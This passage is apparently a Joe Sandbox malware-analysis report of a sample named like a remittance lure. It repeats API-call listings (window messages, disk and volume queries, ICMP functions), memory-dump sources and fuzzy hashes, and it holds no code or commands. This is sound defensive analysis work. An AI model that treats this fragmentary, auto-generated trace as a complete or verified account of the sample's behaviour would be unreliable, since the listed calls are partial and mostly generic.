                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 3375834691-2298589950
                                                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: $<
                                                                      • API String ID: 4104443479-428540627
                                                                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID: \VH
                                                                      • API String ID: 1682464887-234962358
                                                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID: \VH
                                                                      • API String ID: 1682464887-234962358
                                                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID: \VH
                                                                      • API String ID: 1682464887-234962358
                                                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: \VH
                                                                      • API String ID: 2507767853-234962358
                                                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: \VH
                                                                      • API String ID: 2507767853-234962358
                                                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                      • String ID: crts
                                                                      • API String ID: 943502515-3724388283
                                                                      • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                      • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$LabelVolume
                                                                      • String ID: \VH
                                                                      • API String ID: 2006950084-234962358
                                                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                      • DrawMenuBar.USER32 ref: 00449761
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$InfoItem$Draw_malloc
                                                                      • String ID: 0
                                                                      • API String ID: 772068139-4108050209
                                                                      • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                      • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcscpy
                                                                      • String ID: 3, 3, 8, 1
                                                                      • API String ID: 3469035223-357260408
                                                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                                      • API String ID: 2574300362-3530519716
                                                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                                      • API String ID: 2574300362-275556492
                                                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
